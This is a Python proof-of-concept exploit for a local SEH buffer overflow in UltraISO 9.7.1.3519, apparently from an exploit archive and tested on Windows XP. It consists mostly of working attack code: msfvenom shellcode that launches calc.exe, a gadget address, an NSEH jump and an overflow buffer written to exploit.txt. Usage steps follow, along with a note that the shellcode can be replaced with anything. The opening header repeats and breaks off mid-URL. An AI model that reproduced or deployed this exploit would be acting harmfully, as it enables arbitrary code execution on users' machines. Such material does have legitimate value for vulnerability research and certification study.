UltraISO 9.7.1.3519 Local Buffer Overflow

#!/usr/bin/python
# Exploit Title: UltraISO 9.7.1.3519 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https #!/usr/bin/python
# Exploit Title: UltraISO 9.7.1.3519 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.ultraiso.com/
# Version: 9.7.1.3519
# Software Link: https://www.ultraiso.com/download.html
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Thanks to Francisco Ramirez for the original Windows 10 x64 DOS.
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the content to clipboard
# 2.) In the application, click "Make CD/DVD Image"
# 3.) Paste the contents of exploit.txt under 'Output FileName'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#0x72d1170b : pop esi # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [msacm32.drv] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v5.1.2600.0
#NSEH - JMP 0012ED66 (xEBx08)

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "x00x0ax0dx3a" -f c

shellcode = ("xdaxc0xd9x74x24xf4xbfx67xdcx50x39x5dx2bxc9xb1"
"x31x83xc5x04x31x7dx14x03x7dx73x3exa5xc5x93x3c"
"x46x36x63x21xcexd3x52x61xb4x90xc4x51xbexf5xe8"
"x1ax92xedx7bx6ex3bx01xccxc5x1dx2cxcdx76x5dx2f"
"x4dx85xb2x8fx6cx46xc7xcexa9xbbx2ax82x62xb7x99"
"x33x07x8dx21xbfx5bx03x22x5cx2bx22x03xf3x20x7d"
"x83xf5xe5xf5x8axedxeax30x44x85xd8xcfx57x4fx11"
"x2fxfbxaex9exc2x05xf6x18x3dx70x0ex5bxc0x83xd5"
"x26x1ex01xcex80xd5xb1x2ax31x39x27xb8x3dxf6x23"
"xe6x21x09xe7x9cx5dx82x06x73xd4xd0x2cx57xbdx83"
"x4dxcex1bx65x71x10xc4xdaxd7x5axe8x0fx6ax01x66"
"xd1xf8x3fxc4xd1x02x40x78xbax33xcbx17xbdxcbx1e"
"x5cx31x86x03xf4xdax4fxd6x45x87x6fx0cx89xbexf3"
"xa5x71x45xebxcfx74x01xabx3cx04x1ax5ex43xbbx1b"
"x4bx20x5ax88x17x89xf9x28xbdxd5")

buffer = "A" * 304 + "xEBx08x90x90" + "x0bx17xd1x72" + "x90" * 20 + shellcode + "D" * 9448

payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"